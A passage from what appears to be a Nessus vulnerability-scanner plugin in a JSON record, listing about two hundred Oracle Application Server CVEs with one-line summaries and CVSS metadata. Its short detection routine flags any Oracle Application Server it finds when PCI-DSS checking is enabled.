\"CVE-2006-0291\",\n \"CVE-2006-0435\",\n \"CVE-2006-0552\",\n \"CVE-2006-0586\",\n \"CVE-2006-1884\",\n \"CVE-2006-3706\",\n \"CVE-2006-3707\",\n \"CVE-2006-3708\",\n \"CVE-2006-3709\",\n \"CVE-2006-3710\",\n \"CVE-2006-3711\",\n \"CVE-2006-3712\",\n \"CVE-2006-3713\",\n \"CVE-2006-3714\",\n \"CVE-2006-5353\",\n \"CVE-2006-5354\",\n \"CVE-2006-5355\",\n \"CVE-2006-5356\",\n \"CVE-2006-5357\",\n \"CVE-2006-5358\",\n \"CVE-2006-5359\",\n \"CVE-2006-5360\",\n \"CVE-2006-5361\",\n \"CVE-2006-5362\",\n \"CVE-2006-5363\",\n \"CVE-2006-5364\",\n \"CVE-2006-5365\",\n \"CVE-2006-5366\",\n \"CVE-2007-0222\",\n \"CVE-2007-0275\",\n \"CVE-2007-0280\",\n \"CVE-2007-0281\",\n \"CVE-2007-0282\",\n \"CVE-2007-0283\",\n \"CVE-2007-0284\",\n \"CVE-2007-0285\",\n \"CVE-2007-0286\",\n \"CVE-2007-0287\",\n \"CVE-2007-0288\",\n \"CVE-2007-0289\",\n \"CVE-2007-1359\",\n \"CVE-2007-1609\",\n \"CVE-2007-2119\",\n 
\"CVE-2007-2120\",\n \"CVE-2007-2121\",\n \"CVE-2007-2122\",\n \"CVE-2007-2123\",\n \"CVE-2007-2124\",\n \"CVE-2007-2130\",\n \"CVE-2007-3553\",\n \"CVE-2007-3854\",\n \"CVE-2007-3859\",\n \"CVE-2007-3861\",\n \"CVE-2007-3862\",\n \"CVE-2007-3863\",\n \"CVE-2007-5516\",\n \"CVE-2007-5517\",\n \"CVE-2007-5518\",\n \"CVE-2007-5519\",\n \"CVE-2007-5520\",\n \"CVE-2007-5521\",\n \"CVE-2007-5522\",\n \"CVE-2007-5523\",\n \"CVE-2007-5524\",\n \"CVE-2007-5525\",\n \"CVE-2007-5526\",\n \"CVE-2007-5531\",\n \"CVE-2008-0340\",\n \"CVE-2008-0343\",\n \"CVE-2008-0344\",\n \"CVE-2008-0345\",\n \"CVE-2008-0346\",\n \"CVE-2008-0347\",\n \"CVE-2008-0348\",\n \"CVE-2008-0349\",\n \"CVE-2008-1812\",\n \"CVE-2008-1814\",\n \"CVE-2008-1823\",\n \"CVE-2008-1824\",\n \"CVE-2008-1825\",\n \"CVE-2008-2583\",\n \"CVE-2008-2588\",\n \"CVE-2008-2589\",\n \"CVE-2008-2593\",\n \"CVE-2008-2594\",\n \"CVE-2008-2595\",\n \"CVE-2008-2609\",\n \"CVE-2008-2612\",\n \"CVE-2008-2614\",\n \"CVE-2008-2619\",\n \"CVE-2008-2623\",\n \"CVE-2008-3975\",\n \"CVE-2008-3977\",\n \"CVE-2008-3986\",\n \"CVE-2008-3987\",\n \"CVE-2008-4014\",\n \"CVE-2008-4017\",\n \"CVE-2008-5438\",\n \"CVE-2008-7233\",\n \"CVE-2009-0217\",\n \"CVE-2009-0989\",\n \"CVE-2009-0990\",\n \"CVE-2009-0994\",\n \"CVE-2009-1008\",\n \"CVE-2009-1009\",\n \"CVE-2009-1010\",\n \"CVE-2009-1011\",\n \"CVE-2009-1017\",\n \"CVE-2009-1976\",\n \"CVE-2009-1990\",\n \"CVE-2009-1999\",\n \"CVE-2009-3407\",\n \"CVE-2009-3412\",\n \"CVE-2010-0066\",\n \"CVE-2010-0067\",\n \"CVE-2010-0070\",\n \"CVE-2011-0789\",\n \"CVE-2011-0795\",\n \"CVE-2011-0884\",\n \"CVE-2011-2237\",\n \"CVE-2011-2314\",\n \"CVE-2011-3523\"\n );\n\n script_bugtraq_id(\n 1053,\n 2150,\n 2286,\n 2569,\n 3341,\n 3726,\n 3727,\n 4032,\n 4034,\n 4037,\n 4289,\n 4290,\n 4292,\n 4293,\n 4294,\n 4298,\n 4844,\n 4848,\n 5119,\n 5262,\n 5362,\n 5363,\n 5364,\n 5366,\n 5452,\n 5847,\n 5887,\n 5902,\n 5995,\n 5996,\n 6556,\n 6846,\n 7395,\n 9515,\n 9703,\n 10009,\n 10829,\n 10871,\n 
13145,\n 13418,\n 13509,\n 15034,\n 15134,\n 16287,\n 16294,\n 16384,\n 17590,\n 19054,\n 20588,\n 22027,\n 22083,\n 22831,\n 23102,\n 23532,\n 24697,\n 27229,\n 33177,\n 34461,\n 35671,\n 35688,\n 36746,\n 36749,\n 36753,\n 50202,\n 50209\n );\n\n script_name(english:\"Oracle Application Server Multiple Vulnerabilities\");\n script_summary(english:\"Checks version in Server response header.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server may be affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Oracle Application Server. It was not possible\nto determine its version, so the version of Oracle Application Server\ninstalled on the remote host could potentially be affected by multiple\nvulnerabilities :\n\n - CVE-2000-0169: Remote command execution in the web\n listener component.\n\n - CVE-2000-1235: Information disclosure in the port\n listener component and modplsql.\n\n - CVE-2000-1236: SQL injection in mod_sql.\n\n - CVE-2001-0326: Information disclosure in the Java\n Virtual Machine.\n\n - CVE-2001-0419: Buffer overflow in ndwfn4.so.\n\n - CVE-2001-0591: Directory traversal.\n\n - CVE-2001-1216: Buffer overflow in the PL/SQL Apache module.\n\n - CVE-2001-1217: Directory traversal vulnerability in the\n PL/SQL Apache module.\n\n - CVE-2001-1371: Improper access control in the SOAP\n service.\n\n - CVE-2001-1372: Information disclosure.\n\n - CVE-2002-0386: Denial of service through the\n administration module for Oracle Web Cache.\n\n - CVE-2002-0559: Buffer overflows in the PL/SQL module.\n\n - CVE-2002-0560: Information disclosure in the PL/SQL\n module.\n\n - CVE-2002-0561: Authentication bypass in the PL/SQL\n Gateway web administration interface.\n\n - CVE-2002-0562: Information disclosure through\n globals.jsa.\n\n - CVE-2002-0563: Improper access control on several\n services.\n\n - CVE-2002-0564: Authentication bypass in the PL/SQL\n 
module.\n\n - CVE-2002-0565: Information disclosure through JSP files\n in the _pages directory.\n\n - CVE-2002-0566: Denial of service in the PL/SQL module.\n\n - CVE-2002-0568: Improper access control on XSQLConfig.xml\n and soapConfig.xml.\n\n - CVE-2002-0569: Authentication bypass through\n XSQLServlet.\n\n - CVE-2002-0655: Denial of service in OpenSSL.\n\n - CVE-2002-0656: Buffer overflows in OpenSSL.\n\n - CVE-2002-0659: Denial of service in OpenSSL.\n\n - CVE-2002-0840: Cross-site scripting in the default error\n page of Apache.\n\n - CVE-2002-0842: Format string vulnerability in mod_dav.\n\n - CVE-2002-0843: Buffer overflows in ApacheBench.\n\n - CVE-2002-0947: Buffer overflow in rwcgi60.\n\n - CVE-2002-1089: Information disclosure in rwcgi60.\n\n - CVE-2002-1630: Improper access control on sendmail.jsp.\n\n - CVE-2002-1631: SQL injection in query.xsql.\n\n - CVE-2002-1632: Information disclosure through several\n JSP pages.\n\n - CVE-2002-1635: Information disclosure in Apache.\n\n - CVE-2002-1636: Cross-site scripting in the htp PL/SQL\n package.\n\n - CVE-2002-1637: Default credentials in multiple\n components.\n\n - CVE-2002-1858: Information disclosure through the\n WEB-INF directory.\n\n - CVE-2002-2153: Format string vulnerability in the\n administrative pages of the PL/SQL module.\n\n - CVE-2002-2345: Credential leakage in the web cache\n administrator interface.\n\n - CVE-2002-2347: Cross-site scripting in several JSP\n pages.\n\n - CVE-2004-1362: Authentication bypass in the PL/SQL\n module.\n\n - CVE-2004-1363: Buffer overflow in extproc.\n\n - CVE-2004-1364: Directory traversal in extproc.\n\n - CVE-2004-1365: Command execution in extproc.\n\n - CVE-2004-1366: Improper access control on\n emoms.properties.\n\n - CVE-2004-1367: Credential leakage in Database Server.\n\n - CVE-2004-1368: Arbitrary file execution in ISQL*Plus.\n\n - CVE-2004-1369: Denial of service in TNS Listener.\n\n - CVE-2004-1370: Multiple SQL injection vulnerabilities in\n 
PL/SQL.\n\n - CVE-2004-1371: Stack-based buffer overflow.\n\n - CVE-2004-1707: Privilege escalation in dbsnmp and nmo.\n\n - CVE-2004-1774: Buffer overflow in the MD2 package.\n\n - CVE-2004-1877: Phishing vulnerability in Single Sign-On\n component.\n\n - CVE-2004-2134: Weak cryptography for passwords in the\n toplink mapping workBench.\n\n - CVE-2004-2244: Denial of service in the XML parser.\n\n - CVE-2005-1383: Authentication bypass in HTTP Server.\n\n - CVE-2005-1495: Detection bypass.\n\n - CVE-2005-1496: Privilege escalation in the\n DBMS_Scheduler.\n\n - CVE-2005-2093: Web cache poisoning.\n\n - CVE-2005-3204: Cross-site scripting.\n\n - CVE-2005-3445: Multiple unspecified vulnerabilities in\n HTTP Server.\n\n - CVE-2005-3446: Unspecified vulnerability in Internet\n Directory.\n\n - CVE-2005-3447: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2005-3448: Unspecified vulnerability in the OC4J\n module.\n\n - CVE-2005-3449: Multiple unspecified vulnerabilities in\n multiple components.\n\n - CVE-2005-3450: Unspecified vulnerability in HTTP Server.\n\n - CVE-2005-3451: Unspecified vulnerability in\n SQL*ReportWriter.\n\n - CVE-2005-3452: Unspecified vulnerability in Web Cache.\n\n - CVE-2005-3453: Multiple unspecified vulnerabilities in\n Web Cache.\n\n - CVE-2006-0273: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2006-0274: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2006-0275: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2006-0282: Unspecified vulnerability.\n\n - CVE-2006-0283: Unspecified vulnerability.\n\n - CVE-2006-0284: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0285: Unspecified vulnerability in the Java Net\n component.\n\n - CVE-2006-0286: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0287: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0288: Multiple unspecified vulnerabilities in\n the Oracle Reports Developer 
component.\n\n - CVE-2006-0289: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0290: Unspecified vulnerability in the Oracle\n Workflow Cartridge component.\n\n - CVE-2006-0291: Multiple unspecified vulnerabilities in\n the Oracle Workflow Cartridge component.\n\n - CVE-2006-0435: Unspecified vulnerability in Oracle\n PL/SQL.\n\n - CVE-2006-0552: Unspecified vulnerability in the Net\n Listener component.\n\n - CVE-2006-0586: Multiple SQL injection vulnerabilities.\n\n - CVE-2006-1884: Unspecified vulnerability in the Oracle\n Thesaurus Management System component.\n\n - CVE-2006-3706: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3707: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3708: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3709: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3710: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3711: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3712: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3713: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3714: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5353: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5354: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5355: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2006-5356: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5357: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5358: Unspecified vulnerability in the Oracle\n Forms component.\n\n - CVE-2006-5359: Multiple unspecified vulnerabilities in\n Oracle Reports Developer component.\n\n - CVE-2006-5360: Unspecified vulnerability in Oracle Forms\n component.\n\n - CVE-2006-5361: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5362: 
Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5363: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2006-5364: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5365: Unspecified vulnerability in Oracle\n Forms.\n\n - CVE-2006-5366: Multiple unspecified vulnerabilities.\n\n - CVE-2007-0222: Directory traversal vulnerability in\n EmChartBean.\n\n - CVE-2007-0275: Cross-site scripting vulnerability in\n Oracle Reports Web Cartridge (RWCGI60).\n\n - CVE-2007-0280: Buffer overflow in Oracle Notification\n Service.\n\n - CVE-2007-0281: Multiple unspecified vulnerabilities in\n HTTP Server.\n\n - CVE-2007-0282: Unspecified vulnerability in OPMN02.\n\n - CVE-2007-0283: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0284: Multiple unspecified vulnerabilities in\n Oracle Containers for J2EE.\n\n - CVE-2007-0285: Unspecified vulnerability in Oracle\n Reports Developer.\n\n - CVE-2007-0286: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0287: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0288: Unspecified vulnerability in Oracle\n Internet Directory.\n\n - CVE-2007-0289: Multiple unspecified vulnerabilities in\n Oracle Containers for J2EE.\n\n - CVE-2007-1359: Improper access control in mod_security.\n\n - CVE-2007-1609: Cross-site scripting vulnerability in\n servlet/Spy in Dynamic Monitoring Services (DMS).\n\n - CVE-2007-2119: Cross-site scripting vulnerability in the\n Administration Front End for Oracle Enterprise (Ultra)\n Search.\n\n - CVE-2007-2120: Denial of service in the Oracle\n Discoverer servlet.\n\n - CVE-2007-2121: Unspecified vulnerability in the COREid\n Access component.\n\n - CVE-2007-2122: Unspecified vulnerability in the Wireless\n component.\n\n - CVE-2007-2123: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2007-2124: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2007-2130: 
Unspecified vulnerability in Workflow\n Cartridge.\n\n - CVE-2007-3553: Cross-site scripting vulnerability in\n Rapid Install Web Server.\n\n - CVE-2007-3854: Multiple unspecified vulnerabilities in\n the Advanced Queuing component and the Spatial\n component.\n\n - CVE-2007-3859: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-3861: Unspecified vulnerability in Oracle\n Jdeveloper.\n\n - CVE-2007-3862: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-3863: Unspecified vulnerability in Oracle\n JDeveloper.\n\n - CVE-2007-5516: Unspecified vulnerability in the Oracle\n Process Mgmt & Notification component.\n\n - CVE-2007-5517: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5518: Unspecified vulnerability in HTTP Server.\n\n - CVE-2007-5519: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5520: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-5521: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-5522: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5523: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-5524: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-5525: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-5526: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5531: Unspecified vulnerability in Oracle Help\n for Web.\n\n - CVE-2008-0340: Multiple unspecified vulnerabilities in\n the Advanced Queuing component and Spatial component.\n\n - CVE-2008-0343: Unspecified vulnerability in the Oracle\n Spatial component.\n\n - CVE-2008-0344: Unspecified vulnerability in the Oracle\n Spatial component.\n\n - CVE-2008-0345: Unspecified vulnerability in the Core\n RDBMS component.\n\n - CVE-2008-0346: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2008-0347: 
Unspecified vulnerability in the Oracle\n Ultra Search component.\n\n - CVE-2008-0348: Multiple unspecified vulnerabilities in\n the PeopleTools component.\n\n - CVE-2008-0349: Unspecified vulnerability in the\n PeopleTools component.\n\n - CVE-2008-1812: Unspecified vulnerability in the Oracle\n Enterprise Manager component.\n\n - CVE-2008-1814: Unspecified vulnerability in the Oracle\n Secure Enterprise Search or Ultrasearch component.\n\n - CVE-2008-1823: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2008-1824: Unspecified vulnerability in the Oracle\n Dynamic Monitoring Service component.\n\n - CVE-2008-1825: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2583: Unspecified vulnerability in the sample\n Discussion Forum Portlet for the Oracle Portal\n component.\n\n - CVE-2008-2588: Unspecified vulnerability in the Oracle\n JDeveloper component.\n\n - CVE-2008-2589: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2593: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2594: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2595: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2008-2609: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2612: Unspecified vulnerability in the Hyperion\n BI Plus component.\n\n - CVE-2008-2614: Unspecified vulnerability in HTTP Server.\n\n - CVE-2008-2619: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2008-2623: Unspecified vulnerability in the Oracle\n JDeveloper component.\n\n - CVE-2008-3975: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-3977: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-3986: Unspecified vulnerability in the Oracle\n Discoverer Administrator component.\n\n - CVE-2008-3987: Unspecified vulnerability in the Oracle\n Discoverer 
Desktop component.\n\n - CVE-2008-4014: Unspecified vulnerability in the Oracle\n BPEL Process Manager component.\n\n - CVE-2008-4017: Unspecified vulnerability in the OC4J\n component.\n\n - CVE-2008-5438: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-7233: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2009-0217: Signature spoofing vulnerability in\n multiple components.\n\n - CVE-2009-0989: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-0990: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-0994: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-1008: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1009: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1010: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1011: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1017: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-1976: Unspecified vulnerability in HTTP Server.\n\n - CVE-2009-1990: Unspecified vulnerability in the Business\n Intelligence Enterprise Edition component.\n\n - CVE-2009-1999: Unspecified vulnerability in the Business\n Intelligence Enterprise Edition component.\n\n - CVE-2009-3407: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2009-3412: Unspecified vulnerability in the Unzip\n component.\n\n - CVE-2010-0066: Unspecified vulnerability in the Access\n Manager Identity Server component.\n\n - CVE-2010-0067: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2010-0070: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2011-0789: Unspecified vulnerability in HTTP Server.\n\n - CVE-2011-0795: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2011-0884: Unspecified vulnerability 
in the Oracle\n BPEL Process Manager component.\n\n - CVE-2011-2237: Unspecified vulnerability in the Oracle\n Web Services Manager component.\n\n - CVE-2011-2314: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2011-3523: Unspecified vulnerability in the Oracle\n Web Services Manager component.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Verify that the version of Oracle Application Server installed is not\naffected by the listed vulnerabilities and/or filter incoming traffic to this port\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"remote code execution\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-053\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Oracle Secure Backup 10.2.0.2 RCE (Windows)\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22, 79, 119, 200, 255, 264, 287);\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/24\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n 
script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:application_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service2.nasl\");\n script_require_keys(\"Settings/PCI_DSS\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/oracle_application_server\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\n\n# Only PCI considers this an issue.\nif (!get_kb_item(\"Settings/PCI_DSS\")) exit(0, \"PCI-DSS compliance checking is not enabled.\");\n\n# Make sure this is Oracle.\nport = get_kb_item_or_exit(\"Services/oracle_application_server\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# We're flagging every installation of Oracle Application Server, with\n# every vulnerability it has ever had.\nsecurity_hole(port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}